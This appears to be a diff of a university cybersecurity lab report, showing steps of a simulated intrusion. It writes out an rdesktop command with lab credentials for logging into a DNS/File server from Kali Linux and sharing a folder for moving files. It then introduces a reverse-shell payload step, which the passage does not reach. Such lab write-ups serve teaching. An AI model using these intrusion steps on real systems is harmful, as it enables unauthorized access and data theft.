AM311/Cybersecurity_Report/home.md

 	==VERIFICARE CHE SI POSSA FARE DESKTOP REMOTO==

  5. **Open a remote connection to the DNS/File Server:**
 Now that we know the credentials for an account that can logon to the DNS/File Server, we can open a connection to that machine and perform some "useful" actions!
 To open a remote desktop connection, we can use the following command directly from the Kali Linux machine:

     `rdesktop 10.0.2.250 -u DNSoperator -p Qwerty123 -d cybersec.units.it -r disk:share=~/Desktop/share`

-	Using the option `-r disk:share=~/Desktop/share` we can share the folder `share` between the Kali Linux machine and the remote DNS/File Server, so we are able to easily move documents between the two devices.
+	Using the option `-r disk:share=~/Desktop/share` we can share the folder `share` between the Kali machine and the remote DNS/File Server, so we are able to easily move documents between the two devices.

  6. **Generation of a payload for starting a reverse shell and injection:**
 	In a different shell window, we now proceed with the generation of an exploit through which we will try to inject a reverse shell client to the computers of the organization.